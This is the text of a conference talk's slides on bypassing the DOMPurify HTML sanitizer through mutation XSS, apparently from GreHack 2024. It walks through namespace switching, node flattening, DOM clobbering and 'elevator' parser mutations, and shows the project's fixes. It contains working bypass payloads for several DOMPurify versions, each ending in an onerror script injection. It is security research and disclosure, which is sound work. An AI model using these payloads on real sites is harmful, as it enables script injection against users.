Playing with HTML parsing to bypass DOMPurify on default configuration
Kévin (Mizu)
Kévin GERVOT
2/55
Client-Side HTML Sanitizer
Kévin GERVOT
A security feature or tool used to clean HTML content by removing or altering potentially dangerous elements, attributes, or scripts, thereby preventing cross-site scripting (XSS) and other code injection attacks.
Source: ChatGPT 🤫
3/55
DOMPurify
Kévin GERVOT
4/55
parse HTML
sanitize Elements
sanitize Attributes
serialize HTML
sanitize Shadow DOM
Highly simplified version of the DOMPurify logic
HTML string
HTML string
①
②
③
④
⑤
Why are mXSS possible?
Kévin GERVOT
5/55
It is possible that the output of this algorithm, if parsed with an HTML parser, will not return the original tree structure.
[...]
Why are mXSS possible?
Kévin GERVOT
6/55
Dom Tree
<form>
<div>
<form>
<form>
<div></form>
<form>
</form>
html
xhtml
xhtml
xhtml
Dom Tree
<form>
<div>
xhtml
xhtml
xhtml
What the sanitizer sees
What the DOM sees
Namespaces
Kévin GERVOT
7/55
<style><a>
Dom Tree
<style><a>
xhtml
html
xhtml
<svg><style><a>
Dom Tree
<svg>
<style>
<a>
svg
svg
html
svg
<math><style><a>
Dom Tree
<math>
<style>
<a>
mathml
mathml
html
mathml
text
node
node
Integration points
Kévin GERVOT
8/55
List of MathML text integration points:
<mi> | <mo> | <mn> | <ms> | <mtext>
List of HTML integration points:
<annotation-xml>
<foreignObject>
<desc>
<title>
<svg><title><a>
Dom Tree
<svg>
<title>
<a>
html
svg
svg
xhtml
We can switch from SVG to HTML!
DOMPurify 2.0.0 bypass
Kévin GERVOT
9/55
<svg></p><style><a id="</style><img src=x onerror=x>">
DOMPurify 2.0.0
<svg>
<p>
html
<style>
<a id="</style>XSS">
.innerHTML
<svg>
svg
<p>
xhtml
<style><a id="</style>
<img src=x onerror=x>">
(Found by @SecurityMB)
xhtml
xhtml
svg
svg
svg
svg
The <style> tag falls into the HTML namespace, changing its content from a node to text.
DOMPurify 3.1.0 bypass
(IcesFont)
Kévin GERVOT
10/55
Node flattening
Kévin GERVOT
11/55
The algorithm described below places no limit on the depth of the DOM tree generated, or on the length of tag names, attribute names, attribute values, Text nodes, etc.
Node flattening
Kévin GERVOT
12/55
Language | Library | Nested node limit | Handling |
---|---|---|---|
C | libxml2 | 255 | Removing |
Javascript | parse5 | No limit? | - |
Python | html.parser | No limit? | - |
Java | Jsoup | No limit? | - |
Browser | DOMParser | 512 | Flattening |
Node flattening
Kévin GERVOT
13/55
<div*509><svg><style>
Dom Tree
<div*509>
<svg>
<style>
xhtml
svg
<div*510><svg><style>
Dom Tree
<div*510>
<svg>
<style>
html
xhtml
svg
svg
svg
html
Node flattening
Kévin GERVOT
14/55
<a><a>
Dom Tree
<a>
xhtml
svg
<div*509><a><svg><a>
Dom Tree
<div*509>
<a>
<svg>
<a>
html
xhtml
xhtml
svg
<a>
xhtml
svg
html
HTML Parsing states
Kévin GERVOT
15/55
13.2.4 Parse state ............................................................. 1279
13.2.4.1 The insertion mode ................................. 1279
13.2.4.2 The stack of open elements .................. 1280
13.2.4.3 The list of active formatting elements..... 1282
13.2.4.4 The element pointers ................................ 1283
13.2.4.5 Other parsing state flags........................... 1283
Source: HTML Specification.
HTML Insertion modes
Kévin GERVOT
16/55
The insertion mode is a state variable that controls the primary operation of the tree construction stage.
Initially, the insertion mode is "initial". It can change to "before html" [...] "after after frameset" during the course of the parsing [...]. The insertion mode affects how tokens are processed [...].
"in caption" insertion mode
Kévin GERVOT
17/55
The user agent must handle the token as follows:
[...]
↳ A start tag whose tag name is one of: "caption" [...]
[...]
Pop elements from this stack until a caption element has been popped from the stack.
Stack of open elements
Kévin GERVOT
18/55
The stack grows downwards; the topmost node on the stack is the first one added to the stack, and the bottommost node of the stack is the most recently added node in the stack [...].
<table>
<caption>
<div>1</div>
<div>2</div>
</caption>
</table>
html
"in caption" insertion mode
Kévin GERVOT
19/55
<table>
<caption>
<div>1</div>
<caption></caption>
<div>2</div>
</caption>
</table>
Dom Tree
<div>2</div>
<table>
<div>1</div>
xhtml
xhtml
<caption>
xhtml
<caption>
xhtml
xhtml
html
"in caption" insertion mode
Kévin GERVOT
20/55
<table><caption>
<svg>
<title>
<caption></caption>
</title>
<style><a id="</style><img src onerror=x"></a></style>
</svg>
</caption></table>
Dom Tree
<table>
xhtml
<caption>
xhtml
<svg>
svg
<title>
svg
<caption>
xhtml
<style><a id="</style>
html
<img src=x onerror=x><
xhtml
xhtml
It can even traverse namespaces!
"in caption" insertion mode
Kévin GERVOT
21/55
[...]
↳ Anything else
Process the token using the rules for the "in body" insertion mode.
"in caption" insertion mode
Kévin GERVOT
22/55
<table><caption><table><caption>
Dom Tree
<table>
xhtml
svg
svg
<div*508>
<table><caption><table><caption>
Dom Tree
<div*508>
<table>
<caption>
<table>
html
xhtml
xhtml
xhtml
<caption>
<caption>
<table>
xhtml
<caption>
xhtml
xhtml
xhtml
xhtml
html
Nested <caption> through node flattening!
DOMPurify 3.1.0 bypass
Kévin GERVOT
23/55
<div*506>
<table><caption>
<svg>
<title>
<table><caption></caption></table>
</title>
<style><a id="</style><img src onerror=x>"></a></style>
</svg>
</caption></table>
DOMPurify 3.1.0
<div*506>
<table>
xhtml
xhtml
<caption>
xhtml
<svg>
<title>
svg
<table>
<caption>
xhtml
<style>
<a id="[...]">
html
svg
xhtml
svg
svg
DOMPurify 3.1.0 bypass
Kévin GERVOT
24/55
.innerHTML
<div*506>
<img src onerror=x>">
xhtml
xhtml
<table>
xhtml
<caption>
xhtml
<svg>
svg
<title>
svg
<table>
xhtml
<caption>
<style><a id="</style>
xhtml
xhtml
DOMPurify 3.1.1 bypass
(Me)
Kévin GERVOT
25/55
DOMPurify 3.1.1 fix
Kévin GERVOT
26/55
1. The nested nodes limit is set to 252
currentNode.__depth = currentNode.parentNode.__depth + 1;
/* Remove an element if nested too deeply to avoid mXSS */
if (currentNode.__depth >= MAX_NESTING_DEPTH) {
_forceRemove(currentNode);
}
Highly simplified version of the DOMPurify 3.1.1 fix
DOMPurify 3.1.1 fix
Kévin GERVOT
27/55
2. DOM Clobbering protection
elm instanceof HTMLFormElement && (
typeof elm.__depth !== 'undefined' &&
typeof elm.__depth !== 'number'
)
Highly simplified version of the DOMPurify 3.1.1 fix
DOM Clobbering
Kévin GERVOT
28/55
»
x
»
y.
<div id="x">
<form id="y">
<input name="z">
</form>
</div>
z
html
← <div [...]>
← <input [...]>
DOM Clobbering
Kévin GERVOT
29/55
»
f.
← <input name="pare[..]">
»
f.
← undefined
<div>
<form id="f">
<input name="parentNode">
</form>
</div>
parentNode
parentNode.
__depth
html
currentNode.__depth = currentNode.parentNode.__depth + 1;
DOMPurify depth bypass
Kévin GERVOT
30/55
<div*200><form><input name="parentNode"><div*200>
DOMPurify 3.1.1
<div*200>
html
xhtml
<form>
xhtml
<input>
xhtml
<div*200>
xhtml
Kévin GERVOT
31/55
html
<div*200>
<form>
<input name="parentNode">
<div*200>
<form></form><form>
<input name="parentNode">
<div*105>
DOMPurify 3.1.0 Bypass
DOMPurify 3.1.1 bypass
DOMPurify 3.1.2 bypass
(Me)
Kévin GERVOT
32/55
DOMPurify 3.1.2 fix
Kévin GERVOT
33/55
<svg><title><a>
DOMPurify 3.1.2
<svg>
html
svg
<title>
svg
1. Access .parentNode using the getter.
2. Block SVG-to-HTML namespace switch.
const HTML_INTEGRATION_POINTS = ['foreignobject', 'annotation-xml'];
Highly simplified version of the DOMPurify 3.1.2 fix
Second order DOM Clobbering
Kévin GERVOT
34/55
»
x.
<form id="x"></form>
<input form="y" name="z">
id=
html
← "y"
»
x.
z
← undefined
»
y.
z
← <input [...] name="z">
"y"
DOMPurify attributes sanitizing
Kévin GERVOT
35/55
<div id="a "></div>
DOMPurify 3.1.2
<a id="a">
html
xhtml
- Takes the value
- Trims it
- Sanitizes it
- Overwrite it
DOMPurify depth bypass
Kévin GERVOT
36/55
<form id="a "><div*500></div*500></form>
<input form="a" name="__depth">
DOMPurify 3.1.2
<form id="a">
html
xhtml
<div*500>
xhtml
<input name="__depth">
xhtml
For some obscure reason, it doesn't work on Firefox :(
Finding new HTML mutations
Kévin GERVOT
37/55
... FUZZING!
"Elevator" HTML mutation
Kévin GERVOT
38/55
<x><y><z>
<button>
<z>
<button></button>
</z>
</button>
<style></style>
</z></y></x>
DOM Tree
<x>
<y>
xhtml
xhtml
<z>
xhtml
<button>
xhtml
<z>
<button>
<style>
xhtml
html
xhtml
xhtml
<button> can be <dd>, <dt>, <li> or <table>
"Elevator" HTML mutation
Kévin GERVOT
39/55
<x><y><z>
<button>
<x>
<button></button>
</x>
</button>
<style></style>
</z></y></x>
DOM Tree
<x>
<y>
xhtml
xhtml
<z>
xhtml
<button>
xhtml
<x>
<button>
<style>
xhtml
html
xhtml
xhtml
<button> can be <dd>, <dt>, <li> or <table>
"Elevator" HTML mutation
Kévin GERVOT
40/55
<svg><y><title><z>
<button>
<y><z>
<button></button>
</z></y>
</button>
<style></style>
</z></title></y></svg>
DOM Tree
<svg>
<y>
svg
<title>
svg
svg
<style>
html
It can even traverse namespaces!
[Elevator]
xhtml
svg
svg
<z>
xhtml
DOMPurify HTML/SVG tags
Kévin GERVOT
41/55
const COMMON_SVG_AND_HTML_ELEMENTS = addToSet({}, [
'title',
'style',
'font',
'a',
'script',
]);
Source: DOMPurify - /src/purify.js.
Still not working...
Kévin GERVOT
42/55
Can't switch from SVG namespace to HTML namespace...
Still not working...
Kévin GERVOT
43/55
Can't switch from SVG namespace to HTML namespace...
... FUZZING!
"Elevator" HTML mutation v2
Kévin GERVOT
44/55
<x><svg>
<image><x>
<title>
<image></image>
</title>
</x></image>
<style></style>
</svg></x>
DOM Tree
<x>
<svg>
xhtml
svg
<image>
svg
<x>
svg
<image>
<style>
xhtml
html
Browser <image> to <img> conversion works too!
<title>
svg
svg
"Elevator" HTML mutation v2
Kévin GERVOT
45/55
<div*507>
<svg>
<image>
<title>
<svg>
<image></image>
</svg>
</title>
</image>
</svg>
DOM Tree
<div*507>
<svg>
xhtml
svg
<image>
svg
<title>
svg
<image>
html
svg
<svg>
svg
Even if we use HTML integration points, we do not switch to HTML :)
46/55
DOMPurify 3.1.2 bypass
<form id="x ">
<div*504>
<a><svg>
<image>
<a><title>
<svg><image></image></svg>
</title></a>
</image>
<style><a id="</style><img src=x onerror=x>"></a></style>
</svg></a>
<input form="x" name="__depth">
DOMPurify 3.1.2
<form id="x">
<div*504>
xhtml
xhtml
<a>
xhtml
<svg>
xhtml
<image>
svg
<a>
svg
<title>
<svg>
<image>
html
<style>
<a>
<input name="_depth">
svg
svg
svg
svg
svg
xhtml
Kévin GERVOT
DOMPurify 3.1.2 bypass
.innerHTML
<form id="x">
<div*504>
xhtml
xhtml
<a>
xhtml
<svg>
xhtml
<image>
svg
<a>
svg
<title>
<svg>
<img>
<style><a id="</style>
<img src onerror=x>">
<input name="_depth">
svg
svg
xhtml
xhtml
xhtml
xhtml
DOMPurify Triple HTML Parsing bypass
(hash_kitten, ryotkak and I)
Kévin GERVOT
48/55
Mermaid.js
Kévin GERVOT
49/55
function sanitizeMore(txt) {
return DOMPurify.sanitize(txt);
}
text = DOMPurify.sanitize(sanitizeMore(text, config), config);
Highly simplified version of the Mermaid.js sanitizing process.
Triple HTML parsing bypass
Kévin GERVOT
50/55
${"<form><h1></form><table><form></form></table></form></table></h1></form>".repeat(510)}
<math>
<mi>
<style><!--</style>
<style id="--></style></mi></math><img src=x onerror=x>"></style>
</mi>
</math>
DOMPurify 3.1.2
<form>
<h1>
xhtml
<table>
<form>
"mXSS payload"
mathml
<math>
mathml
html
xhtml
xhtml
xhtml
x510
Depth of 4
Triple HTML parsing bypass
Kévin GERVOT
.innerHTML
<form>
<h1>
xhtml
<table>
<form>
<table>
<h1>
xhtml
xhtml
xhtml
<math>
<mi>
New depth = nb of patterns = 510
mathml
<style><!--</style>
<style id="-->XSS"></style>
xhtml
xhtml
[...]
xhtml
mathml
xhtml
xhtml
Triple HTML parsing bypass
Kévin GERVOT
.innerHTML
<form>
<h1>
xhtml
<table>
<h1>
<table>
xhtml
xhtml
xhtml
<math>
<mi>
mathml
<style><!--[...]--></style>
<img src=x onneror=x>"<
xhtml
xhtml
xhtml
[...]
mathml
mathml
52/55
What's next?
Kévin GERVOT
53/55
DOMPurify 3.1.3 fix
Kévin GERVOT
if (regExpTest(/((--!?|])>)|<\/(style|title)/i, value)) {
_removeAttribute(name, currentNode);
continue;
}
Highly simplified version of the DOMPurify 3.1.3 fix
<div id="-->"></div>
DOMPurify 3.1.2
<div>
html
xhtml
Conclusion
Kévin GERVOT
55/55
GreHack 2024 | Playing with HTML parsing to bypass DOMPurify on default configuration
By Kévin (Mizu)
GreHack 2024 | Playing with HTML parsing to bypass DOMPurify on default configuration
- 1,070